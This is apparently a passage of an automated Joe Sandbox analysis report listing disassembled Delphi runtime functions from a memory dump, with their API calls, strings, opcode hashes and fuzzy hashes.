                                                                                                  • API ID: System@$System@@$Unicode$String$Char$qqrx20FileFreeInfoMem$qqriMem$qqrpvVersion$Asg$qqrr20Move$qqrpxvpviQuerySizeString$qqriString$qqrr20Stringx20UniqueValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3340374955-0
                                                                                                  • Opcode ID: dddfb272de7c6e7c87dd35fe2d24d2a7e29585c5b1d1b6a14b8fcc4ff7acbc84
                                                                                                  • Instruction ID: 20c290cfac2a6ec53872fbffc8a20628a873dcac3785a9ff7ef993043faeba55
                                                                                                  • Opcode Fuzzy Hash: dddfb272de7c6e7c87dd35fe2d24d2a7e29585c5b1d1b6a14b8fcc4ff7acbc84
                                                                                                  • Instruction Fuzzy Hash: 69215871A0568AAFDB01DFE9ED51C6EB7FCEF49200B914672B504E3251D734AE04C690
                                                                                                  Function 50006ADC Relevance: 15.0, APIs: 10, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@TObject@ClassName$qqrv.RTL120(00000000,50006B69), ref: 50006B08
                                                                                                    • Part of subcall function 50006AC4: @System@UTF8ToString$qqrrx28System@%SmallString$iuc$255%.RTL120 ref: 50006AD1
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50006B69), ref: 50006B10
                                                                                                    • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50006B69), ref: 50006B15
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,50006B69), ref: 50006B1E
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,00000000,00000000,50006B69), ref: 50006B27
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,50006B69), ref: 50006B2C
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,00000000,50006B69), ref: 50006B35
                                                                                                  • CompareStringW.KERNEL32(?,00000001,00000000,00000000,00000000,00000000,00000000,50006B69), ref: 50006B43
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$String$System@@$Char$qqrx20EnsureLen$qqrx20String$qqrr20System@%$AnsiClassCompareFromInternalName$qqrvObject@SmallStr$qqrr20String$iuc$255%String$qqrrx28Stringx27T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 2698194505-0
                                                                                                  • Opcode ID: 7a18ea293cba9f4f732223db10a86afe3026c92dbc0af962d2106ebeff8d67eb
                                                                                                  • Instruction ID: 07edf7bba6b7798c112338542bf63ced82e12cf919ecdcd04dcacc31e71116a0
                                                                                                  • Opcode Fuzzy Hash: 7a18ea293cba9f4f732223db10a86afe3026c92dbc0af962d2106ebeff8d67eb
                                                                                                  • Instruction Fuzzy Hash: 9D017174505288AFEB10EBE4EC6299EB7BCEF59310F904677B404E3652DB30AA009696
                                                                                                  Function 50014BAC Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 298COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 500123E4: @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(?,500145C0), ref: 500123F0
                                                                                                    • Part of subcall function 500123E4: @System@@RaiseExcept$qqrv.RTL120(?,500145C0), ref: 500123F5
                                                                                                  • @System@Exp$qqrxg.RTL120 ref: 50014D27
                                                                                                  • @Math@LnXP1$qqrxg.RTL120(?,?,?), ref: 50014D6E
                                                                                                  • @System@Exp$qqrxg.RTL120 ref: 50014D7C
                                                                                                  • @System@Exp$qqrxg.RTL120(?,?,?), ref: 50014D9B
                                                                                                  • @System@Ln$qqrxg.RTL120 ref: 50014E8F
                                                                                                  • @System@Exp$qqrxg.RTL120(?,?,?), ref: 50014F05
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Exp$qqrxg$Except$qqrvException@$bctr$qqrx20Ln$qqrxgMath@P1$qqrxgRaiseStringSystem@@Sysutils@Unicode
                                                                                                  • String ID: InterestRate
                                                                                                  • API String ID: 309294142-3580794093
                                                                                                  • Opcode ID: 124f8ed047251f2e0df9bb2f8c7ea5488eeba9d01d2cc3390b6a8d904b7b764a
                                                                                                  • Instruction ID: d6d9cfc9d9be970d20f1fa582e04d4b86400008520249d3d5693622e2192696a
                                                                                                  • Opcode Fuzzy Hash: 124f8ed047251f2e0df9bb2f8c7ea5488eeba9d01d2cc3390b6a8d904b7b764a
                                                                                                  • Instruction Fuzzy Hash: D7C19660E091AD9ADF619BF4DC546CDBFB0FF05A00F15469BE8E8B3256E63249A1CF40
                                                                                                  Function 50025C2C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(00000000,50025D3F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025C48
                                                                                                    • Part of subcall function 50025BF0: @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?), ref: 50025C0C
                                                                                                    • Part of subcall function 50025BF0: @System@LoadResString$qqrp20System@TResStringRec.RTL120 ref: 50025C1E
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025D3F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025C7D
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025D3F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025CA0
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025D3F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025CEE
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025D3F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025D13
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$Asg$qqrr20Stringx20$Locale$FreeLoadMem$qqrpvMove$qqrpxvpviStr$qqriix20String$qqriString$qqrp20Sysutils@Thread
                                                                                                  • String ID: ,lP$kP
                                                                                                  • API String ID: 2884738061-2562396607
                                                                                                  • Opcode ID: 1e640ef11e0d861ae4c35bea9addde5ea34473f93be08e639f16d76bd6c0e43e
                                                                                                  • Instruction ID: 16dec81e5f93945b5e2b83e1c7f6ec167d3ec98a1fb52082471023d7d843a8a0
                                                                                                  • Opcode Fuzzy Hash: 1e640ef11e0d861ae4c35bea9addde5ea34473f93be08e639f16d76bd6c0e43e
                                                                                                  • Instruction Fuzzy Hash: 8131E871B411496BDB04CAC4EC91FBF73AADB98310F914627F905DB341DA39ED0183A5
                                                                                                  Function 5001C4D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C580), ref: 5001C503
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                    • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                    • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C580), ref: 5001C52A
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C580), ref: 5001C550
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,5001C580), ref: 5001C55D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@$Cat3$qqrr20Char$qqrx20Copy$qqrx20Delimiter$qqrx20LastScan$qqrpxbbStringiiStringt1Stringt2Stringx20
                                                                                                  • String ID: .\:
                                                                                                  • API String ID: 2717076658-496007442
                                                                                                  • Opcode ID: a89fb4eec0d62e8afcb9bcc628ec571381857e07fc04220a90b3bcf355591fdb
                                                                                                  • Instruction ID: d01c72174dcf2e075b5b8dd55ecc10e744eed8894acf6479d7133b6cc06a8146
                                                                                                  • Opcode Fuzzy Hash: a89fb4eec0d62e8afcb9bcc628ec571381857e07fc04220a90b3bcf355591fdb
                                                                                                  • Instruction Fuzzy Hash: 9B119330A00688EBDB04DFE9D89199DB3F9EF49310BA083B6E41093251EB70EF81DA40
                                                                                                  Function 50005914 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,B",?,?,?,00000000), ref: 50005949
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,B",?,?,?,00000000), ref: 50005952
                                                                                                  • MoveFileW.KERNEL32(00000000), ref: 50005958
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,B",?,?,?,00000000), ref: 5000597D
                                                                                                  • @System@SetInOutRes$qqri.RTL120(00000000,?,00000000,B",?,?,?,00000000), ref: 50005982
                                                                                                  • @System@SetInOutRes$qqri.RTL120(00000000,B",?,?,?,00000000), ref: 5000598E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Res$qqriSystem@@Unicode$Array$qqrr20Char$qqrx20ErrorFileFromLastMoveStringStringpbi
                                                                                                  • String ID: B"
                                                                                                  • API String ID: 3244090159-4078893311
                                                                                                  • Opcode ID: 4a2eb7b6fd8b58eeb8d6c45eddf589e6c8aac0e0df426a6a7fc9b1bc2b78b412
                                                                                                  • Instruction ID: df590b721be1972d76404118b1dd1283823992a997f97f748f899e6b97df8a74
                                                                                                  • Opcode Fuzzy Hash: 4a2eb7b6fd8b58eeb8d6c45eddf589e6c8aac0e0df426a6a7fc9b1bc2b78b412
                                                                                                  • Instruction Fuzzy Hash: 3601F5302056C5DAFB20EBA4D9B16AF72ECDF59222FD00A76F640D2112E6659E0081A5
                                                                                                  Function 5001062C Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                  • @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                    • Part of subcall function 5002A908: GetLastError.KERNEL32(50010679,00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5002A908
                                                                                                    • Part of subcall function 5002A908: @Sysutils@RaiseLastOSError$qqri.RTL120(50010679,00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5002A90D
                                                                                                  • LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                  • @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                  • LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                  • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Last$RaiseSysutils@$Error$qqrvResource$ErrorError$qqriFindLoadLock
                                                                                                  • String ID: CHARTABLE$PkP
                                                                                                  • API String ID: 2693630376-1680022972
                                                                                                  • Opcode ID: 1eb605201eaa7e6766b98b1e00adbd3eb7b47462771e20d424d66e1f26d623af
                                                                                                  • Instruction ID: cc429218ece2e4869d3c0890a31dc3911705f99bbb730b9440c9ee6bded52d1b
                                                                                                  • Opcode Fuzzy Hash: 1eb605201eaa7e6766b98b1e00adbd3eb7b47462771e20d424d66e1f26d623af
                                                                                                  • Instruction Fuzzy Hash: 9D0144B47517818FE71CDF94EDA099577F5BB98310B09862DE182D7761CB78D880CB60
                                                                                                  Function 50008524 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 38filewindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000855D
                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF,?,?,?,?,?,?,500086BE,500041BB), ref: 50008563
                                                                                                  • GetStdHandle.KERNEL32(000000F5,500085B0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF), ref: 50008578
                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,500085B0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF), ref: 5000857E
                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 5000859C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                  • String ID: 0CP$Error$Runtime error at 00000000
                                                                                                  • API String ID: 1570097196-3976705077
                                                                                                  • Opcode ID: c7f65587848cdab12b096d8458637050e43fc9a3475b859aec640a5b1c1ffc15
                                                                                                  • Instruction ID: 13760cef71b14ba24bdf52ca3db3f2b841d9a020471f696476a3b083ba67eecc
                                                                                                  • Opcode Fuzzy Hash: c7f65587848cdab12b096d8458637050e43fc9a3475b859aec640a5b1c1ffc15
                                                                                                  • Instruction Fuzzy Hash: 14F0F652901AC0BAFA1093D06C62FC535989BA0A29FD8470AF650690D2E77445C49722
                                                                                                  Function 5001B598 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(5001B7D4), ref: 5001B59D
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5001B5CA
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000001,5001B7D4), ref: 5001B5B8
                                                                                                    • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(5001B7D4), ref: 5001B5D4
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000001,5001B7D4), ref: 5001B5EF
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5001B601
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$ArraySystem@$Length$qqrvUnicode$Asg$qqrr20StringStringx20$Length$qqrrpvpvipi
                                                                                                  • String ID: False$True
                                                                                                  • API String ID: 1602069110-1895882422
                                                                                                  • Opcode ID: dc1f99dea7fc06d24d915c1314f15eaf0c255ee8a481010edc47a443f1a80566
                                                                                                  • Instruction ID: a813428639982090d4a362bd633a8cf1e7a719357de9231205594663fbfa07b6
                                                                                                  • Opcode Fuzzy Hash: dc1f99dea7fc06d24d915c1314f15eaf0c255ee8a481010edc47a443f1a80566
                                                                                                  • Instruction Fuzzy Hash: FBF01C7170118197F714A7E4FC52B6A33A2EBA0714F404239FA448F6A6DB6AFC818BC1
                                                                                                  Function 5000730C Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@TMonitor@TryEnter$qqrv.RTL120 ref: 5000731C
                                                                                                    • Part of subcall function 500076F4: GetCurrentThreadId.KERNEL32 ref: 500076F7
                                                                                                  • GetTickCount.KERNEL32 ref: 50007343
                                                                                                  • GetTickCount.KERNEL32 ref: 50007355
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 50007388
                                                                                                  • GetTickCount.KERNEL32 ref: 500073AC
                                                                                                  • GetTickCount.KERNEL32 ref: 500073E6
                                                                                                  • @System@TMonitor@GetEvent$qqrv.RTL120 ref: 500073F1
                                                                                                  • GetTickCount.KERNEL32 ref: 50007410
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 50007486
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CountTick$CurrentThread$Monitor@System@$Enter$qqrvEvent$qqrv
                                                                                                  • String ID:
                                                                                                  • API String ID: 1987720909-0
                                                                                                  • Opcode ID: 20729751b9ca491032756733baeeb24b399c546541366898f273070eb1456356
                                                                                                  • Instruction ID: cdbcf1bc501056cecbbc3dd38a171081e16c6904e9569bf655de2ffa8f35bad7
                                                                                                  • Opcode Fuzzy Hash: 20729751b9ca491032756733baeeb24b399c546541366898f273070eb1456356
